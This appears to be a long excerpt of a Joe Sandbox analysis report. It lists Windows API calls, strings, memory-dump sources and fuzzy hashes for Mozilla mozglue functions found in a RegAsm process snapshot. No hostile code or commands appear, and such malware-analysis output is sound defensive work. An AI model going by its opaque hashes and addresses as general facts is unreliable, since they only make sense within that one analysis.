                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C615F66
                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C615F7E
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000024), ref: 6C615F27
                                                                                                                                                          • Part of subcall function 6C61CA10: mozalloc_abort.MOZGLUE(?), ref: 6C61CAA2
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6155E1), ref: 6C615E8C
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6155E1), ref: 6C61605D
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6155E1), ref: 6C6160CC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                                                                        • String ID: GeckoMain
                                                                                                                                                        • API String ID: 3711609982-966795396
                                                                                                                                                        • Opcode ID: a5e06ebbc09d4f57006caee3540747dbb494dab81c08d15ac5ece0d352031ffd
                                                                                                                                                        • Instruction ID: 46774e2325fe573b30328bf1f39c50c0b59e4c1e6e91b1dd399c00f6ee1052ab
                                                                                                                                                        • Opcode Fuzzy Hash: a5e06ebbc09d4f57006caee3540747dbb494dab81c08d15ac5ece0d352031ffd
                                                                                                                                                        • Instruction Fuzzy Hash: DB71C1B06097409FD710DF29C480A6ABBF0FF8A305F54496DE58687B52D730E948CBAA
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C6031C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C603217
                                                                                                                                                          • Part of subcall function 6C6031C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C603236
                                                                                                                                                          • Part of subcall function 6C6031C0: FreeLibrary.KERNEL32 ref: 6C60324B
                                                                                                                                                          • Part of subcall function 6C6031C0: __Init_thread_footer.LIBCMT ref: 6C603260
                                                                                                                                                          • Part of subcall function 6C6031C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C60327F
                                                                                                                                                          • Part of subcall function 6C6031C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C60328E
                                                                                                                                                          • Part of subcall function 6C6031C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6032AB
                                                                                                                                                          • Part of subcall function 6C6031C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6032D1
                                                                                                                                                          • Part of subcall function 6C6031C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6032E5
                                                                                                                                                          • Part of subcall function 6C6031C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6032F7
                                                                                                                                                        • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C619675
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C619697
                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6196E8
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C619707
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C61971F
                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C619773
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6197B7
                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C6197D0
                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C6197EB
                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C619824
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                        • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                        • API String ID: 3361784254-3880535382
                                                                                                                                                        • Opcode ID: 35ab22d9f16fbcaf5fea408ca7dbcfe9b31e6ea094f6a190bbd73b46ca77b58a
                                                                                                                                                        • Instruction ID: 9495da241eb4927d42ad5624f297b9cc98dfb54800bd3d16e6db891f34c0a29c
                                                                                                                                                        • Opcode Fuzzy Hash: 35ab22d9f16fbcaf5fea408ca7dbcfe9b31e6ea094f6a190bbd73b46ca77b58a
                                                                                                                                                        • Instruction Fuzzy Hash: 5061E871606201AFEF00DF6AE8D8B9A7BB4EF4B319F104529E91597B40D7309854CBBE
                                                                                                                                                        APIs
                                                                                                                                                        • InitializeCriticalSection.KERNEL32(6C68F618), ref: 6C666694
                                                                                                                                                        • GetThreadId.KERNEL32(?), ref: 6C6666B1
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C6666B9
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C6666E1
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68F618), ref: 6C666734
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C66673A
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68F618), ref: 6C66676C
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 6C6667FC
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C666868
                                                                                                                                                        • RtlCaptureContext.NTDLL ref: 6C66687F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                                                                        • String ID: WalkStack64
                                                                                                                                                        • API String ID: 2357170935-3499369396
                                                                                                                                                        • Opcode ID: 12aba6e5b6fde774beaeabaff212d0d476ee187395c156706207a1d07c0a042b
                                                                                                                                                        • Instruction ID: fdaed06e82c52788ad17506af5d46a5865f88574948718225e1a50a405420aa7
                                                                                                                                                        • Opcode Fuzzy Hash: 12aba6e5b6fde774beaeabaff212d0d476ee187395c156706207a1d07c0a042b
                                                                                                                                                        • Instruction Fuzzy Hash: 1751A071A0A301AFD711CF26D88479ABBF4BF8A714F00491DF59997A40D770E904CBAB
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C614A68), ref: 6C64945E
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C649470
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C649482
                                                                                                                                                          • Part of subcall function 6C649420: __Init_thread_footer.LIBCMT ref: 6C64949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64DE73
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64DF7D
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64DF8A
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64DFC9
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64DFF7
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C64E000
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C614A68), ref: 6C64DE7B
                                                                                                                                                          • Part of subcall function 6C6494D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6494EE
                                                                                                                                                          • Part of subcall function 6C6494D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C649508
                                                                                                                                                          • Part of subcall function 6C63CBE8: GetCurrentProcess.KERNEL32(?,6C6031A7), ref: 6C63CBF1
                                                                                                                                                          • Part of subcall function 6C63CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6031A7), ref: 6C63CBFA
                                                                                                                                                        • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C614A68), ref: 6C64DEB8
                                                                                                                                                        • free.MOZGLUE(00000000,?,6C614A68), ref: 6C64DEFE
                                                                                                                                                        • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C64DF38
                                                                                                                                                        Strings
                                                                                                                                                        • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C64E00E
                                                                                                                                                        • [I %d/%d] locked_profiler_stop, xrefs: 6C64DE83
                                                                                                                                                        • <none>, xrefs: 6C64DFD7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                                                                                        • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                                                                                        • API String ID: 1281939033-809102171
                                                                                                                                                        • Opcode ID: 8a6426dcdf7e9d073ca28811bbbb3bb594c8d564fc9172bed2122cb4f9292bc5
                                                                                                                                                        • Instruction ID: 49f2adc90237a9bb10148221d620359c734e0b5c02e28a8634a21246738e7b35
                                                                                                                                                        • Opcode Fuzzy Hash: 8a6426dcdf7e9d073ca28811bbbb3bb594c8d564fc9172bed2122cb4f9292bc5
                                                                                                                                                        • Instruction Fuzzy Hash: EE410771B02510ABDB209F66D8487AA7775EF8734CF54C116E90597B42C7709806CBFE
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C65D4F0
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C65D4FC
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C65D52A
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C65D530
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C65D53F
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C65D55F
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C65D585
                                                                                                                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C65D5D3
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C65D5F9
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C65D605
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C65D652
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C65D658
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C65D667
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C65D6A2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2206442479-0
                                                                                                                                                        • Opcode ID: f8008af5896ec7dfbbdedd3ebc01b75c3f4d1b6252a162f87c7a9ed167b9303a
                                                                                                                                                        • Instruction ID: f4a278eeda3b46f9cae127b3fd66c46bae691a26c7eb8aff55abb823cdc5966f
                                                                                                                                                        • Opcode Fuzzy Hash: f8008af5896ec7dfbbdedd3ebc01b75c3f4d1b6252a162f87c7a9ed167b9303a
                                                                                                                                                        • Instruction Fuzzy Hash: 9F519071605705EFC700CF35C888A9ABBF4FF8A358F50862DE94A87751DB30A855CBA9
                                                                                                                                                        APIs
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C6256D1
                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6256E9
                                                                                                                                                        • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C6256F1
                                                                                                                                                        • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C625744
                                                                                                                                                        • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C6257BC
                                                                                                                                                        • GetTickCount64.KERNEL32 ref: 6C6258CB
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68F688), ref: 6C6258F3
                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C625945
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68F688), ref: 6C6259B2
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C68F638,?,?,?,?), ref: 6C6259E9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                                                                        • String ID: MOZ_APP_RESTART
                                                                                                                                                        • API String ID: 2752551254-2657566371
                                                                                                                                                        • Opcode ID: d0b77877cbdac0e0de90b9862b6791b4b6f9acba5907e60b8c56051dbde6c491
                                                                                                                                                        • Instruction ID: 67d5a8a2db79f057ec644b7e773d637d1b8a62fe6507e58938f8d5b6a1899b21
                                                                                                                                                        • Opcode Fuzzy Hash: d0b77877cbdac0e0de90b9862b6791b4b6f9acba5907e60b8c56051dbde6c491
                                                                                                                                                        • Instruction Fuzzy Hash: 7AC19D31A09390AFD715CF29C48066AB7F1BFCB314F158B1DE8C4A7664D734A885CB9A
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C614A68), ref: 6C64945E
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C649470
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C649482
                                                                                                                                                          • Part of subcall function 6C649420: __Init_thread_footer.LIBCMT ref: 6C64949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64EC84
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C64EC8C
                                                                                                                                                          • Part of subcall function 6C6494D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6494EE
                                                                                                                                                          • Part of subcall function 6C6494D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C649508
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64ECA1
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64ECAE
                                                                                                                                                        • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C64ECC5
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64ED0A
                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C64ED19
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C64ED28
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C64ED2F
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64ED59
                                                                                                                                                        Strings
                                                                                                                                                        • [I %d/%d] profiler_ensure_started, xrefs: 6C64EC94
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                        • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                        • API String ID: 4057186437-125001283
                                                                                                                                                        • Opcode ID: fb2323764b7947454e2bb21450588ffd54039ea0ba4dfdc044f7ae000a5f59a2
                                                                                                                                                        • Instruction ID: a8890f89fe33868e7f5cbf61bf51becf64b1d5f09242ae2278feb18353a9164c
                                                                                                                                                        • Opcode Fuzzy Hash: fb2323764b7947454e2bb21450588ffd54039ea0ba4dfdc044f7ae000a5f59a2
                                                                                                                                                        • Instruction Fuzzy Hash: 8D219175601104BFDB009F65DC48A9AB779EF8736DF10C211F91897742DB3598068BBE
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C60EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C60EB83
                                                                                                                                                        • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C64B392,?,?,00000001), ref: 6C6491F4
                                                                                                                                                          • Part of subcall function 6C63CBE8: GetCurrentProcess.KERNEL32(?,6C6031A7), ref: 6C63CBF1
                                                                                                                                                          • Part of subcall function 6C63CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6031A7), ref: 6C63CBFA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                                                                                        • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                                                                                        • API String ID: 3790164461-3347204862
                                                                                                                                                        • Opcode ID: aa8fbf04e46d6be6c95ccceae3939bd6f0f38d618bcfc5f0f2d584f484c8f77e
                                                                                                                                                        • Instruction ID: f1add088bc5d01c0d079e61dac75778c67559aef1bb308bbfde47da75cf0b9dd
                                                                                                                                                        • Opcode Fuzzy Hash: aa8fbf04e46d6be6c95ccceae3939bd6f0f38d618bcfc5f0f2d584f484c8f77e
                                                                                                                                                        • Instruction Fuzzy Hash: BBB1D5B0B012099BDB04CF99C591BEEBBB5AF85318F108819D506ABF80D7719944CBED
                                                                                                                                                        APIs
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C62C5A3
                                                                                                                                                        • WideCharToMultiByte.KERNEL32 ref: 6C62C9EA
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C62C9FB
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C62CA12
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C62CA2E
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C62CAA5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                                                                        • String ID: (null)$0
                                                                                                                                                        • API String ID: 4074790623-38302674
                                                                                                                                                        • Opcode ID: 1d149284216b592b6872582f149770803c6f113bd9967e46e7753820d4f9bdda
                                                                                                                                                        • Instruction ID: 5e9383af182bc38c62beb67e7f2a1b837035fab83991b442b3ca87a554a2172f
                                                                                                                                                        • Opcode Fuzzy Hash: 1d149284216b592b6872582f149770803c6f113bd9967e46e7753820d4f9bdda
                                                                                                                                                        • Instruction Fuzzy Hash: 70A1B230609342AFEB10DF29C59475ABBF1AFCA748F04891CE98A97641D739D805CF9A
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C603492
                                                                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C6034A9
                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C6034EF
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C60350E
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C603522
                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C603552
                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C60357C
                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C603592
                                                                                                                                                          • Part of subcall function 6C63AB89: EnterCriticalSection.KERNEL32(6C68E370,?,?,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284), ref: 6C63AB94
                                                                                                                                                          • Part of subcall function 6C63AB89: LeaveCriticalSection.KERNEL32(6C68E370,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C63ABD1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
